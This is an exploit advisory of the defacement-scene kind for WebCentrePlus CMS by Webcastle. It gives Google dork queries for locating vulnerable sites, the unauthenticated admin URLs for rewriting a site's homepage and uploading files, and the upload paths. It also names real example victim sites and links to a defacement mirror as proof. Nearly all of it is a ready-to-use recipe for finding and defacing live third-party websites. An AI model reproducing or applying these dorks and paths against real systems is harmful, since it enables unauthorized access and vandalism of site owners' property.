################################################################################# # Exploit Title : Copyright © 2018 WebCentrePlus CMS by Webcastle Insecure Unencoded Admin Control Panel ByPass Vulnerability # Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepages => webcentreplus.com - webcastle.co.uk # Date: 22/05/2018 # Exploit Risk : Medium ################################################################################# # Exploit Title : Copyright © 2018 WebCentrePlus CMS by Webcastle Insecure Unencoded Admin Control Panel ByPass and Wysiwyg Editor Vulnerability # Google Dork => intext:''Copyright © 2018 WebCentrePlus'' # Google Dork => intext:''CMS by Webcastle'' # Exploit => ...../admin/siteContent/index.html # You can edit website Homepage via => ...../admin/siteContent/editText.html?id=1 # You will see your index on the homepage of the site. # Admin Panel without username and password [ Screenshot ] => cdn.pbrd.co/images/Hmow6lo.png # Secondly you can upload and image on the website without any authorization. # ....../admin/siteContent/uploadDynamic.html Guidelines : You can upload images of type GIF, JPG or PNG only. Remember that large images will take a while to download. Note : It says => You must specify a new image file and a name. Please complete the missing information below and click 'Upload'. # ...../images/upload/dynamic/RANDOM-NUMBERS.png .jpg .gif or your uploaded image file goes to this path # ...../images/upload/RANDOM-NUMBERS.png .jpg .gif ################################################################################# # Example Site : # nowlogiXt.com/admin/siteContent/index.html # linXuxtrial.com/admin/siteContent/index.html # Example Mirror [ Proof ] => archive.is/M8jdH ################################################################################# # Discovered By : KingSkrupellos from Cyberizm.Org # Greetings : All Moslem Hackers and Cyberizm Digital Security Team